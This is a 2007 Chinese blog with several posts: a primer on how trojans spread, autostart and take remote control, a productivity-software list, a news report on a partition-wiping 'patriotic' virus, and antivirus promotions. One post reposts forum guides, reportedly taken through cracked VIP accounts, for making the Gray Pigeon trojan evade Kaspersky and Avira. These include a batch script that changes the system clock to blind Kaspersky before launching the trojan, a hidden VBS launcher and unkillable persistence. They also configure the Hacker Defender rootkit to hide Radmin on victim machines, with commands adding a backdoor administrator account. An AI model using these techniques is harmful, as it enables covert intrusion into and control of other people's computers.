2007年10月30日星期二

特洛伊木馬傳播方式及其危害

英文叫做“Trojan house”,其名稱取自希臘神話的特洛伊木馬記。 它是一種基于遠程控制的黑客工具,具有隱蔽性和非授權性的特點。 所謂隱蔽性是指木馬的設計者為了防止木馬被發現,會采用多種手段隱藏木馬,這樣服務端即使發現感染了木馬,由于不能確定其具體位置,往往只能望“馬”興 歎。 所謂非授權性是指一旦控制端與服務端連接後,控制端將享有服務端的大部分操作權限,包括修改文件,修改注冊表,控制鼠標,鍵盤等等,而這些權力並不是服務 端賦予的,而是通過木馬程序竊取的。
從木馬的發展來看,基本上可以分為兩個階段。 最初網絡還處于以UNIX平台為主的時期,木馬就産生了,當時的木馬程序的功能相對簡單,往往是將一段程序嵌入到系統文件中,用跳轉指令來執行一些木馬的 功能,在這個時期木馬的設計者和使用者大都是些技術人員,必須具備相當的網絡和編程知識。 而後隨著WINDOWS平台的日益普及,一些基于圖形操作的木馬程序出現了,用戶界面的改善,使使用者不用懂太多的專業知識就可以熟練的操作木馬,相對的 木馬入侵事件也頻繁出現,而且由于這個時期木馬的功能已日趨完善,因此對服務端的破壞也更大了。 所以所木馬發展到今天,已經無所不用其極,一旦被木馬控制,你的電腦將毫無秘密可言。

一個完整的木馬系統由硬件部分,軟件部分和具體連接部分組成------
(1)硬件部分:建立木馬連接所必須的硬件實體。 控制端:對服務端進行遠程控制的一方。 服務端:被控制端遠程控制的一方。 INTERNET:控制端對服務端進行遠程控制,數據傳輸的網絡載體。
(2)軟件部分:實現遠程控制所必須的軟件程序。 控制端程序:控制端用以遠程控制服務端的程序。 木馬程序:潛入服務端內部,獲取其操作權限的程序。 木馬配置程序:設置木馬程序的端口號,觸發條件,木馬名稱等,使其在服務端藏得更隱蔽的程序。
(3)具體連接部分: 通過INTERNET在服務端和控制端之間建立一條木馬通道所必須的元素。 控制端IP,服務端IP:即控制端,服務端的網絡地址,也是木馬進行數據傳輸的目的地。 控制端端口,木馬端口:即控制端,服務端的數據入口,通過這個入口,數據可直達控制端程序或木馬 程序。

用木馬這種黑客工具進行網絡入侵,從過程上看大致可分為六步,下面就按這六步來詳細闡述木馬的攻擊原理。

一.配置木馬
一般來說一個設計成熟的木馬都有木馬配置程序,從具體的配置內容看,主要是為了實現以下兩方面功能:
(1)木馬僞裝:木馬配置程序為了在服務端盡可能的好的隱藏木馬,會采用多種僞裝手段,如修改圖標 ,捆綁文件,定制端口,自我銷毀等,我們將在“傳播木馬”這一節中詳細介紹。
(2)信息反饋:木馬配置程序將就信息反饋的方式或地址進行設置,如設置信息反饋的郵件地址,IRC號 ,ICO號等等,具體的我們將在“信息反饋”這一節中詳細介紹。

二.傳播木馬
(1)傳播方式:
木馬的傳播方式主要有兩種:一種是通過E-MAIL,控制端將木馬程序以附件的形式夾在郵件中發送出 去, 收信人只要打開附件系統就會感染木馬;另一種是軟件下載,一些非正規的網站以提供軟件下載為 名義, 將木馬捆綁在軟件安裝程序上,下載後,只要一運行這些程序,木馬就會自動安裝。
(2)僞裝方式:
鑒于木馬的危害性,很多人對木馬知識還是有一定了解的,這對木馬的傳播起了一定的抑制作用,這 是木馬設計者所不願見到的,因此他們開發了多種功能來僞裝木馬,以達到降低用戶警覺,欺騙用戶的目的。
(a)修改圖標
當你在E-MAIL的附件中看到這個圖標時,是否會認為這是個文本文件呢?但是我不得不告 訴你,這也有可能是個木馬程序,現在 已經有木馬可以將木馬服務端程序的圖標改成HTML,TXT, ZIP等各種文件的圖標,這有相當大的迷 惑性,但是目前提供這種功能的木馬還不多見,並且這種 僞裝也不是無懈可擊的,所以不必整天提 心吊膽,疑神疑鬼的。
(b)捆綁文件
這種僞裝手段是將木馬捆綁到一個安裝程序上,當安裝程序運行時,木馬在用戶毫無察覺的 情況下 ,偷偷的進入了系統。至于被捆綁的文件一般是可執行文件(即EXE,COM一類的文件)。
(c)出錯顯示
有一定木馬知識的人都知道,如果打開一個文件,沒有任何反應,這很可能就是個木馬程序, 木馬的 設計者也意識到了這個缺陷,所以已經有木馬提供了一個叫做出錯顯示的功能。當服務 端用戶打開木 馬程序時,會彈出一個如下圖所示的錯誤提示框(這當然是假的),錯誤內容可自由 定義,大多會定制成 一些諸如“文件已破壞,無法打開的!”之類的信息,當服務端用戶信以 為真時,木馬卻悄悄侵入了 系統。
(d)定制端口
很多老式的木馬端口都是固定的,這給判斷是否感染了木馬帶來了方便,只要查一下特定的 端口就 知道感染了什麽木馬,所以現在很多新式的木馬都加入了定制端口的功能,控制端用戶可 以在1024---65535之間任選一個端口作為木馬端口(一般不選1024以下的端口),這樣就給判斷 所感染木馬類型帶 來了麻煩。
(e)自我銷毀
這項功能是為了彌補木馬的一個缺陷。我們知道當服務端用戶打開含有木馬的文件後,木馬 會將自己拷貝到WINDOWS的系統文件夾中(C:\WINDOWS或C:\WINDOWS\SYSTEM目錄下),一般來說 原木馬文件 和系統文件夾中的木馬文件的大小是一樣的(捆綁文件的木馬除外),那麽中了木馬 的朋友只要在近來 收到的信件和下載的軟件中找到原木馬文件,然後根據原木馬的大小去系統 文件夾找相同大小的文件, 判斷一下哪個是木馬就行了。而木馬的自我銷毀功能是指安裝完木 馬後,原木馬文件將自動銷毀,這 樣服務端用戶就很難找到木馬的來源,在沒有查殺木馬的工 具幫助下,就很難刪除木馬了。
(f)木馬更名
安裝到系統文件夾中的木馬的文件名一般是固定的,那麽只要根據一些查殺木馬的文章,按 圖索骥在系統文件夾查找特定的文件,就可以斷定中了什麽木馬。所以現在有很多木馬都允許控 制端用戶自由定制安裝後的木馬文件名,這樣很難判斷所感染的木馬類型了。

三.運行木馬

服務端用戶運行木馬或捆綁木馬的程序後,木馬就會自動進行安裝。首先將自身拷貝到WINDOWS的 系統文件夾中(C:\WINDOWS或C:\WINDOWS\SYSTEM目錄下),然後在注冊表,啓動組,非啓動組中設置好木馬 的觸發條件 ,這樣木馬的安裝就完成了。安裝後就可以啓動木馬了,具體過程見下圖:

(1)由觸發條件激活木馬

觸發條件是指啓動木馬的條件,大致出現在下面八個地方:
1.注冊表:打開HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\下的五個以Run 和RunServices主鍵,在其中尋找可能是啓動木馬的鍵值。
2.WIN.INI:C:\WINDOWS目錄下有一個配置文件win.ini,用文本方式打開,在[windows]字段中有啓動 命令 load=和run=,在一般情況下是空白的,如果有啓動程序,可能是木馬。

3.SYSTEM.INI:C:\WINDOWS目錄下有個配置文件system.ini,用文本方式打開,在[386Enh],[mic], [drivers32]中有命令行,在其中尋找木馬的啓動命令。
4.Autoexec.bat和Config.sys:在C盤根目錄下的這兩個文件也可以啓動木馬。但這種加載方式一般都 需要控制端用戶與服務端建立連接後,將已添加木馬啓動命令的同名 文件上傳 到服務端覆蓋這兩個文件才行。
5.*.INI:即應用程序的啓動配置文件,控制端利用這些文件能啓動程序的特點,將制作好的帶有木馬 啓動命令的同名文件上傳到服務端覆蓋這同名文件,這樣就可以達到啓動木馬的目的了。
6.注冊表:打開HKEY_CLASSES_ROOT\文件類型\shell\open\command主鍵,查看其鍵值。舉個例子,國産 木馬“冰河”就是修改HKEY_CLASSES_ROOT\txtfile\shell\open\command下的鍵值,將“C :\WINDOWS \NOTEPAD.EXE %1”該為“C:\WINDOWS\SYSTEM\SYXXXPLR.EXE %1”,這時你雙 擊一個TXT文件 後,原本應用NOTEPAD打開文件的,現在卻變成啓動木馬程序了。還要說明 的是不光是TXT文件 ,通過修改HTML,EXE,ZIP等文件的啓動命令的鍵值都可以啓動木馬 ,不同之處只在于“文件類型”這個主鍵的差別,TXT是txtfile,ZIP是WINZIP,大家可以 試著去找一下。
7.捆綁文件:實現這種觸發條件首先要控制端和服務端已通過木馬建立連接,然後控制端用戶用工具 軟件將木馬文件和某一應用程序捆綁在一起,然後上傳到服務端覆蓋原文件,這樣即使 木馬被刪 除了,只要運行捆綁了木馬的應用程序,木馬又會被安裝上去了。
8.啓動菜單:在“開始---程序---啓動”選項下也可能有木馬的觸發條件。

(2)木馬運行過程

木馬被激活後,進入內存,並開啓事先定義的木馬端口,准備與控制端建立連接。這時服務端用 戶可以在MS-DOS方式下,鍵入NETSTAT -AN查看端口狀態,一般個人電腦在脫機狀態下是不會有端口 開放的,如果有端口開放,你就要注意是否感染木馬了。下面是電腦感染木馬後,用NETSTAT命令查 看端口的兩個實例: 其中①是服務端與控制端建立連接時的顯示狀態,②是服務端與控制端還未建立連接時的顯示狀態。

在上網過程中要下載軟件,發送信件,網上聊天等必然打開一些端口,下面是一些常用的端口:
(1)1---1024之間的端口:這些端口叫保留端口,是專給一些對外通訊的程序用的,如FTP使用21, SMTP使用25,POP3使用110等。只有很少木馬會用保留端口作為木馬端口 的。
(2)1025以上的連續端口:在上網浏覽網站時,浏覽器會打開多個連續的端口下載文字,圖片到本地 硬盤上,這些端口都是1025以上的連續端口。
(3)4000端口:這是OICQ的通訊端口。
(4)6667端口:這是IRC的通訊端口。 除上述的端口基本可以排除在外,如發現還有其它端口打開,尤其是數值比較大的端口,那就要懷疑 是否感染了木馬,當然如果木馬有定制端口的功能,那任何端口都有可能是木馬端口。

四.信息泄露:

一般來說,設計成熟的木馬都有一個信息反饋機制。所謂信息反饋機制是指木馬成功安裝後會收集 一些服務端的軟硬件信息,並通過E-MAIL,IRC或ICO的方式告知控制端用戶。

五.建立連接:

一個木馬連接的建立首先必須滿足兩個條件:一是 服務端已安裝了木馬程序;二是控制端,服務端都要在線 。在此基礎上控制端可以通過木馬端口與服 務端建立連接。A 機為控制端,B機為服務端,對于A機來說要與B機建立連接必須知道B機的木馬端口和IP地 址,由于木馬端口是A機事先設定的,為已知項,所以最重要的是如何獲得B機的IP地址。獲得B機的IP 地址的方法主要有兩種:信息反饋和IP掃描。對于前一種已在上一節中已經介紹過了,不再贅述,我們 重點來介紹IP掃描,因為B機裝有木馬程序,所以它的木馬端口7626是處于開放狀態的,所以現在A機只 要掃描IP地址段中7626端口開放的主機就行了,例如圖中B機的IP地址是202.102.47.56,當A機掃描到 這個IP時發現它的7626端口是開放的,那麽這個IP就會被添加到列表中,這時A機就可以通過木馬的控 制端程序向B機發出連接信號,B機中的木馬程序收到信號後立即作出響應,當A機收到響應的信號後, 開啓一個隨即端口1031與B機的木馬端口7626建立連接,到這時一個木馬連接才算真正建立。值得一提 的要掃描整個IP地址段顯然費時費力,一般來說控制端都是先通過信息反饋獲得服務端的IP地址,由于 撥號上網的IP是動態的,即用戶每次上網的IP都是不同的,但是這個IP是在一定範圍內變動的,如圖中 B機的IP是202.102.47.56,那麽B機上網IP的變動範圍是在202.102.000.000---202.102.255.255,所以 每次控制端只要搜索這個IP地址段就可以找到B機了。

六.遠程控制:

木馬連接建立後,控制端端口和木馬端口之間將會出現一條通道.控制端上的控制端程序可藉這條通道與服務端上的木馬程序取得聯系,並通過木馬程序對服務端進行遠 程控制。下面我們就介紹一下控制端具體能享有哪些控制權限,這遠比你想象的要大。
(1)竊取密碼:一切以明文的形式,*形式或緩存在CACHE中的密碼都能被木馬偵測到,此外很多木馬還 提供有擊鍵記錄功能,它將會記錄服務端每次敲擊鍵盤的動作,所以一旦有木馬入侵, 密碼將很容易被竊取。
(2)文件操作:控制端可藉由遠程控制對服務端上的文件進行刪除,新建,修改,上傳,下載,運行,更改屬 性等一系列操作,基本涵蓋了WINDOWS平台上所有的文件操作功能。
(3)修改注冊表:控制端可任意修改服務端注冊表,包括刪除,新建或修改主鍵,子鍵,鍵值。有了這 項功能控制端就可以禁止服務端軟驅,光驅的使用,鎖住服務端的注冊表,將服務端 上木馬的觸發條件設置得更隱蔽的一系列高級操作。
(4)系統操作:這項內容包括重啓或關閉服務端操作系統,斷開服務端網絡連接,控制服務端的鼠標, 鍵盤,監視服務端桌面操作,查看服務端進程等,控制端甚至可以隨時給服務端發送信息.

2007年10月26日星期五

(轉貼)木馬灰鴿子文章分享,告戒大家不要迷信“殺軟”

裏面有僅次於灰鴿子作者葛軍的二號人物鳳凰木馬鴿子主代理論壇weiwen的原創帖子,不乏對付或摧毀小紅傘antivir以及卡巴斯基的方法,全部收費內容供網友免費學習!!!

帖子內容介紹:“灰鴿子病毒”由於所謂的“新聞聯播”的報道,現已轉入地下,已經不再收VIP會員(原來成為VIP要100元/年),本人 破解了幾個VIP的ID,上灰鴿子論壇將VIP或者有“威望”才能看的精華貼整理了一下,供大家學習電腦安全高級知識,有一些木馬“免殺”(免於殺軟查 殺)的技術,屬“賊”對付所謂“警察”的技術,給特別是迷信所謂“殺軟”(所謂的“殺毒軟體”)、“防火牆”的朋友一個警戒,屬本人原創帖,我將多個鴿子 VIP論壇的精華貼整理到一起發

100%過卡巴6.0行為的方法
本帖被 weiwen 執行加亮操作(2007-04-04)
在我們新的修改版沒有公佈出來之前,鳳凰會員暫時可用這種方法卡巴6.0的行為攔截。

1.過卡巴6.0的啟動攔截的方法:如:在安裝名稱$(WinDir)\G_Server2006.exe改為$(WinDir)\G_Server2006去除尾碼的方法。
2.過兩個插入進程的提示方法:只要在高級選擇中的1和3不打勾即可。
3.可以重新修改插入進程,這樣就100%過卡巴的6.0行為了。
注:通常新用戶修改第一步已經OK的了,因為卡巴的默認安裝後是不打開進程插入監控的.

經過幾天的努力..終於做出了第一次過小紅傘的VIP1.23無殼鴿子
大家可以測試一下.. 可以導入配置資訊(原配置資訊已經刪掉.運行了也沒關係).
只做了小紅傘的免殺..其他都沒做..主要是發出來跟大家分享一下...
只能發連接...
剛改了下載連接..現在可以直接下載了!!!

修改方法簡單可以這樣說

加花打底/定位特徵碼/查出特徵碼為輸入表的DLL的文件名(DLL文件名無法修改和移動)/ 再移動輸入表資訊(特徵碼會自動轉移,很BT,紅傘似乎會跟著你的變化而變化)/再找一個紅傘查殺行走路線的點給NOP掉(本人找不到原理,純粹靠試 驗...原理還需要近一步研究)(因為改特徵點已經無用.只能在它的"行走"路線上設卡..)
以上說法可能存在不對之處,請高人指明..

過卡吧主動防禦思路
思路就是修改系統時間,達到卡巴實效,然後鴿子運行,然後再把系統時間改回來,首先要準備好你的免殺鴿子
先打開記事本,把以下代碼保存為time.bat,(文字全為說明,不用複製)
@echo
set date=%date% 令參數%data%等於現在的日期,一會兒恢復時間用
date 1987-12-18 修改系統時間使卡巴監控失效
ping -n 10 127.0.0.1 等待10秒,10秒後卡巴已經挂了,
start notepad 運行程式(可以換成鴿子)
ping -n 5 127.0.0.1 等待5秒,
date %date% 改回來時間,卡巴又復活了

但是運行的那個DOS窗口實在看著不爽
我們在建個腳本,打開記事本,把以下代碼保存為a.vbs
Set shell = Wscript.createobject("wscript.shell")
a = shell.run ("time.bat",0)
現在已經隱藏運行了,有條件的可以改造,甚至可以根據這個思路寫個小程式
本帖最近評分記錄:
鳳凰幣:10 (By weiwen) | 2007-02-01 11


要過葛軍自家專殺很簡單,配置的時候無註冊,無服務,無尾碼,配置出來後改進程,自定義啟動方式,反正別用鴿子自帶的啟動方式就OK了,具體做法就是把配置好的無註冊和服務的EXE做成資源,用DELPHI或VB以捆綁方式重新編譯下,加入自定義開機啟動方式,保證什麼自己專殺也傻瓜。

配製的時只選註冊表啟動一項就可以過專殺

過鴿子自家專殺以及不死神鴿子的製作方法.
首先申明下,此方法需要編程基礎,並非人人能掌握.
一:過葛軍專殺,首先配置鴿子服務端,記住無註冊,無服務,無尾碼,不要隱藏進程,注射IE.配置結束後修改注射進程,注射到一些無法結束的系統進程就 行,不過雖然系統進程,但是還是能結束的,為什麼?因為注射並非DLL載入,還是有相同的獨立進程,經驗豐富的老鳥隨便就結束掉了,但是糊下菜鳥沒什麼問 題,上面改完的話已經過掉了IE防漏和一般的專殺,但是運行有問題,因為無啟動項.下面把改好進程,測試沒問題的服務端再進行免殺,免殺的方法就不詳細說 了,相關教程很多,免殺完畢開始過葛軍專殺,把配置好的鴿子服務端當作資源,用DELPHI或VB用資源捆綁方式,並加入自定義開機啟動方式,如何開機啟 動方式還是用註冊表吧,寫的好的話直接連卡巴主防的註冊表監控都過,甚至可以領先於系統啟動.到這裡,葛軍專殺就已經過了,不信的話自己測試去.
二:殺軟殺不盡,關機開又來的不死神鴿.首先還是配置,無註冊,無服務,注射IE,不隱藏進程,重要的一點,運行後不要刪除本身.然後還是修改進程,免殺 等等,這裡的鴿子服務端免殺要保證文件都過,內存什麼的沒什麼關係,改完後就開始再次用DELPHI或VB資源捆綁了,這次有點麻煩,要設置好這個不刪除 本身服務端的複製路徑,同時資源捆綁的文件要本身刪除,不留痕跡,還要加入自定義開機啟動指向那個運行後不刪除自身的服務端,這樣就實現了不死神鴿,運行 原理是這樣的,開機啟動服務端,並且複製到指定路徑啟動,這樣就過了自家專殺,行為,防漏,主動,等等,哪怕被內存查殺,甚至對應文件查殺,只要保證你的 不刪除服務端不被查殺,則殺軟殺不盡,開機又回來.


駭客守衛者+鴿子免殺=無敵神鴿
[post] 我們都知道鳳凰VIP的免殺鴿子很好用,這是公認的,這個鴿子中到家用PC上還可以但要是放到伺服器上就有點讓人擔心了.
1.管理員查下進程就OK了,
2.看下可以服務,因為鴿子他會加為服務,
3.netstat -an這個我就不用說了吧 大家都知道.
好了,現在我就為大家做個無敵神鴿,其實用一個軟體就可以了,
駭客守衛者,一個內核級後門軟體,先看下他的說明大家就都明白了,
駭客守護者是一款異常強大的驅動級後門!可以隱藏你的木馬和後門的端口,服務,進程
這裡寫入你要隱藏的文件和文件夾名稱
第一個是隱藏駭客守衛者自己的,建議不要刪除
好,比如我們給肉雞裝了個Radmin吧,那我們就在隱藏文件裏把它的服務端文件rserver.exe加到這裡
注意一行一個哦~
你也可以用通配符*
這樣到話只要是以rserv開頭到文件夾和文件名都會隱藏
------------------------
隱藏進程和隱藏文件一樣
我們把rserver.exe也加到這裡
當然,它同樣支援通配符*
下面是隱藏服務
Radmin的服務名是r_server
所以我們把它加到下面
------------------------
隱藏端口
4899是RADMIN到默認端口,TCP協議的,那麼我們在TCP端口裏面添上4899
可能你還開了肉雞的3389,那我們把3389也加到裏面,用[,]隔開
UDP端口和TCP端口一樣
------------------------
隱藏註冊表
已經有的是駭客守衛者自己的註冊表項
你可以在這裡把你的木馬的註冊表項隱藏
RADMIN的註冊表項是RAdmin
所以我們加到裏面就可以了
------------------------
跟隨啟動
就是讓某個程式跟隨駭客守衛者啟動
它支援系統變數和運行參數
比如要肉雞開機後添加一個用戶
我們可以這樣添
%windir%\system32\cmd.exe /c net user coofly 123456 /add
你要提權這個用戶的話再加一個
%windir%\system32\cmd.exe /c net localgroup administrators coofly /add
這樣就好了``
------------------------
後門設置
駭客守衛者啟動後,你可以從任意一個端口用駭客守衛者提供的客戶端進行連接,得到一個管理員許可權的CMD SHELL
連接口令就是你登錄SHELL的口令了
駭客守衛者是以驅動和服務兩種方法啟動的
服務名稱就是駭客守衛者的啟動服務名稱了
顯示名稱和描述大家應該都明白,如果改了服務名稱,那麼在隱藏服務裏應該把改後的服務名稱也加進去
比如我改成
hackdoor
那麼我們應該在隱藏服務裏它把也加進去
驅動名稱和驅動文件名稱可以隨便改
不過要注意的是驅動文件名稱必須是.SYS結尾的
------------------------
生成配置
現在已經配置好了,我們可以生成配置文件了
點生成配置,然後選擇保存位置
添上文件名,點保存就可以OK咯!!~
現在大家應該明白怎麼可以做出無敵的鴿子了吧!
因為駭客守衛者生成出來的是兩個文件你要想和鴿子捆綁到一塊可以用個鳳凰的捆綁軟體就可以了..[/post]

對世面上出現幾款遠控調查
上興 18 票
牧民灰鴿子 8 票
網路紅娘 3 票
守望者 4 票
熊寶寶遠控 6 票
黑洞 13 票
黑贏 2 票
其他…… 9 票

2007年10月23日星期二

高效率電腦工作 免費九招教給你

1. 重新命名檔案。沒有正確命名的檔案常常令人傷神。你很難藉著檔案名字判斷出該檔案的內容。但是重新命名檔案可是一件費時的事了。Rename Master可以簡單快速的命名一批檔案。你可以消除部份的檔案名字,然後用附在MP3或圖片中的資料標簽來命名。網址: www.joejoesoft.com/vcms/108

2. 即時傳訊服務。及時傳遞訊息可以簡易快速的和朋友們保持聯絡。然而,你可能沒有辦法在共用電腦上使用及時傳訊。Meebo讓你從網路上連結到各式的即時傳訊服務。你不需要灌任何軟體,但是你卻可以一次使用各類包括AIM、雅虎、谷歌、MSN的傳訊服務。網址:www.meebo.com

3. 使用網路電郵。現在許多人都使用網路電子郵件服務(Web mail),儘管在哪都可以查閱電郵,速度上來說卻慢了點。通常你可能需要付費用像Outlook這樣的收信軟體來收信,但是ePrompter這個小程 式讓你可以從筆記型電腦直接接收電子郵件。ePrompter可以在你收到新郵件的時候提醒你。這個小程式支援雅虎、Gmail、 Hotmail等網路電子郵件服務。網址:/www.eprompter.com

4. 製造PDF檔案。當你要分享文件時,PDF檔案是個好幫手。任何人都可以用免費的Adobe Reader讀取PDF檔案。然而,創造PDF檔案的軟體卻相當昂貴。DoPDF不能編輯PDF檔案,但是可以用視窗中的任一程式創造PDF檔案。從此以 後,創造PDF檔案就像列印檔案一樣簡單了!網址:www.dopdf.com

5. 整理電腦硬體和軟體。你曾經需要主機和RAM的資訊嗎?Belarc Advisor告訴你你的電腦中到底有哪些硬體和軟體。它也告訴你電腦上一次掃毒的時間。或者你也可以瀏覽視窗更新的清單。它甚至可以重建失落的產品碼(product keys)。 網址:www.belarc.com

6. 整理相片。想找更好的方式整理你的相片?Picasa幫你找出電腦裏頭的相片,並使他們易於瀏覽。Google Desktop則幫你找出電腦中任何你想尋找的檔案。若是不想使用Microsoft Office,你也可以使用StarOffice來幫你完成文書處理的工作。網址:picasa.google.com 、desktop.google.com、 sun.com/staroffice

7. 整理音樂檔案。音樂檔案有各式各樣的類型。不幸的是,音樂播放軟體並不和每一種檔案相容。如果你換了音樂播放軟體, 可就麻煩了!BonkEnc可以將未受保護的音樂轉換成各式檔案。他也可以從CD中擷取音樂,甚至可以降低檔案的位元數,這樣你就可以將更多音樂塞進音樂 播放軟體中。網址:www.bonkenc.org

8. 儲存口令。常常為了忘記口令而頭大嗎?理想狀況是,每一個不同的網站,不同的服務使用不同的口令,你的帳戶會因此而更安全,然而誰 有金頭腦可以記得所有的口令呢?KeePass可以幫你的忙,只要將你的名字和口令放進編碼後的資料庫,你就只需要記得一個主要口令就行了。你可以將這個 軟體存在隨身碟裏,隨處帶著走。 網址: http://keepass.info/

9. 簡化重復工作。IBM最近也在IBM線上社群上發表了一個免費的網上服務CoScripter。一般人往往每天都得 花一些時間做些重復的工作。CoScripter可以幫忙簡化每天必須重復做的流程,像是檢查新郵件、查詢飛機抵達時間和尋找無線網路區域。 CoScripter可以將這些流程複製下來成為每天必跑的流程“劇本”,然後每天固定幫你執行這個劇本,你也可以因此省下許多時間。這樣的想法也為許多 企業所樂見。因為節省下來的時間可以幫助企業增加競爭力。網址:http://services.alphaworks.ibm.com/coscripter

準備好要應用這些免費妙招了嗎?分享給你的朋友們知道吧!讓大家一起享受科技帶來的方便!

2007年10月17日星期三

愛國病毒





  近日,互聯網上出現了一種具有“見機行事”功能的病毒,與常見的電腦病毒不同的是,這種代碼為Win32/KillDPT的病毒,會根據機器的操作系統類型決定中止運行還是入侵破壞,並被譽為“專殺其它語種系統,是中國人就安全”,以致部分網友驚呼“病毒也愛國”。

  ●對簡體中文操作系統無影響

  據瞭解,該病毒為一種“分區表”殺手病毒,而率先披露該病毒的是北京的一家反病毒中心。據介紹,該病毒運行後會首先讀取註冊表的一個鍵值,並判定當前操作系統的類型,如果是簡體中文操作系統,該病毒會自動退出運行,不會對電腦產生任何影響;如果是日本語言或印度尼西亞語言操作系統,該病毒則會破壞硬盤分區表,自動向電腦硬盤中填充垃圾數據,進而造成系統重啟後無法找到引導系統,並最終導致電腦徹底癱瘓;而如果是英文系統,則也會自動退出但同時彈出“Your luck‘s so good!(這顯然是句中國式英語,字面直譯應該是”你運氣真好“)”的對話框。

  除了上述“極端”方式外,該病毒還具有一種反“台獨”的“愛國功能”,該病毒一旦監測到目標電腦是繁體中文的操作系統,則退出並彈出“阿扁下臺”消息。記者從這家反病毒中心提供的截圖上看到,儘管消息的語言並不是十分通順,但充滿了“愛國主義情緒”,其中不乏“阿扁同志,你那麼喜歡台獨你要臉麼……你想做歷史罪人?滾吧,你!我們是中國人!死也是中國魂”語句。

  記者在隨後的調查中瞭解到,針對日本語操作系統進行發洩甚至攻擊的計算機病毒並非首例。事實上,早在三年多前,網上就曾流傳一種代碼為W32.Welchia.B的“衝擊波殺手”的變種病毒,該病毒只會攻擊日文系統而對中、英文系統不會進行惡意攻擊,當時被稱作是“愛國”病毒、“仇日”病毒。

  ●病毒編寫者被定位為“憤青”

  而此次把“台獨分子阿扁”也包括在攻擊範圍之內的Win32/KillDPT病毒,則被部分網友認定是W32.Welchia.B的“升級版本”。也有網友對病毒編寫者的這種行為提出了質疑,並以此將編寫者定位為“憤青”。

  對此,北京江民公司反病毒中心的楊工程師表示,從編寫者的意圖看,很可能是為了發洩不滿,就目前該中心監測的情況看,該病毒對中文系統暫時未產生任何不良影響,不過他也提醒電腦用戶注意防範,“稍微略作修改,就可能會對任何語言的操作系統都產生不良影響”。

  ●前世今生

  2004年2月13日,瑞星全球反病毒監測網在國內率先截獲一個“衝擊波殺手”病毒的變種W32.Welchia.B病毒。該病毒只攻擊日文系統,並顯示九一八事變、七七事變、南京大屠殺、珍珠港事件和日本投降紀念日等標誌性日期,而對中、英文系統不光不進行惡意攻擊,還會幫助這些用戶下載微軟的補丁程序修補系統漏洞,當時被稱作是“愛國”病毒、“仇日”病毒。

  2004年3月22日,瑞星全球反病毒監測網率先截獲“莫國防II”(Win32.MGF.Hoker.10)病毒。該病毒會監測系統時間,當日期為5月的第4個星期時,就顯示標題為“中國紅客”的對話框。對話框內容是:釣魚島是中國領土,倭寇和狗不得入內!違憲出兵國外,否認歷史事實,美化侵略戰爭,參拜“靖國神社”裏的戰犯,倭國無恥!奉勸你不要碰到中國紅客,否則打到你滿地找牙!

  如果用戶使用的是日文系統,那當系統時間為8月15日(日本投降日)時,病毒會在系統目錄裏釋放一個“win.com”文件,在屏幕上顯示“You can not continue,because your country―――Japan Killed 40,000,000 peoples since 1894-1945!!!!!”(你的機器完蛋了,因為你的國家―――日本在1894年-1945年間殺害了4000萬人!)然後強制系統死機。(來源: 南方都市報)  

2007年10月13日星期六

ViGUARD

美國政府和軍方自1998年使用的 IPS

ViGUARD is an IPS solution (Intrusion Protection System) used by government and military institutions since 1998, providing real-time protection for
your computer without relying on signature databases.

Hence, your protection does not depend on signature updates.

Using a multi-layered stacked security, ViGUARD ensures the integrity and control of your system, protecting it against known and unknown viruses, worms, Trojans & spyware:

- Protects sensitive registry keys & startup folders, which are hijacked by Spyware & Worms.
- Protects your executable files in real-time against unauthorized modification.
- Prevents code injection & termination of privileged processes.
- Intercepts dangerous email attachments & downloads.
- Provides sandbox protection for script files.
- Detects and removes Microsoft Office(tm) auto-macros.
- Unique FileWall module: rule-based file and application protection.
- Monitors Network activity.

A kernel-based driver engine protects the computer in real-time against
emerging threats, including registry hijack, unauthorized file modifications, as well as providing repair functionnality, quarantine capabilities, process protection and Microsoft Office(tm) Documents macro analysis.

An integrated smart network filter monitors Email traffic for potentially harmful contents and unauthorized connections.

With an intuitive graphic user interface and comprehensive alerts ViGUARD
is scaling from home-user utilisation to enterprise grade and roaming user
deployment with remote administration console, distributed client report
functionnality, workstation group management and much more...

ViGUARD 11: http://www.softpedia.com/progDownload/ViGUARD-Download-21890.html
ViGUARD 12: http://www.download.com/ViGuard/3000-2239_4-10583753.html?tag=all-titles-V-2

2007年10月11日星期四

特奧會網絡安全的守護神—ESET NOD32殺毒軟件

在第12屆國際特殊奧林匹克運動會(以下簡稱特奧會)上, ESET NOD32防病毒軟件憑借優秀的品質被特奧會組委會所采購,為本次盛會的電腦網絡安全保駕護航。

十月二日晚,歡樂、祥和、隆重的二○○七年世界夏季特殊奧林匹克運動會開幕式在上海舉行。中國國家主席胡錦濤出席開幕式並宣布本屆特奧會開幕。本屆特奧會吸引了165個國家和地區組團與會(含朝鮮觀察團),共有10207人。

“天地與我並生,萬物與我為一”,追求萬物並進、圓融無間、社會和諧是中華民族的傳統,而特奧致力于改變人們對智障人士的態度、消除漠視和排斥,讓社會理 解和接納他們,正好與這一優秀傳統相符合。此次特奧會在上海舉辦,充分展示了中國人權保障事業發展的成就,展示了中國社會關注、關愛、尊重、扶助智障人士 的風尚。

作為在全球獲得超過100多個獎項的ESET NOD32殺毒軟件,包括Virus Bulletin以及AV Comparative 2006年度總冠軍,PC Magazine、ICSA認證,Checkmark認證等,而且還是全球唯一通過45次VB100%測試的殺毒軟件,此次當之無愧地成為本屆特奧會官方 使用的防病毒軟件。

ESET榮獲了45次Virus Bulletin VB100榮譽,比其他任何廠商都多。在Virus Bulletin的比較測試中,從1998年5月起,ESET的産品從未遺漏任何一種現實世界導致感染的(in the wild)病毒。

在AV-Comparatives的獨立測試中,ESET NOD32總是能夠在所有測試品牌中取得最佳成績。“ESET NOD32是所有獲得Advanced+獎項的佼佼者,在最近的五次測試中都取得了最高的榮譽。這意味著在近12個月測試的所有産品中,ESET NOD32擁有最佳的主動偵測惡意軟件的能力。”

ESET NOD32只占極少系統資源,不會影響電腦速度,能帶給您升級硬件般的感受。ESET NOD32掃描速度全球領先,高達40MB/s以上,這樣在用戶掃描系統就不必再漫長等待。而且,在殺毒軟件業界無出其右的啓發式技術也確保了發現未知病 毒的有效性,並且尤其難能可貴的是在高效率啓發未知病毒的同時保持了極低的誤報率。

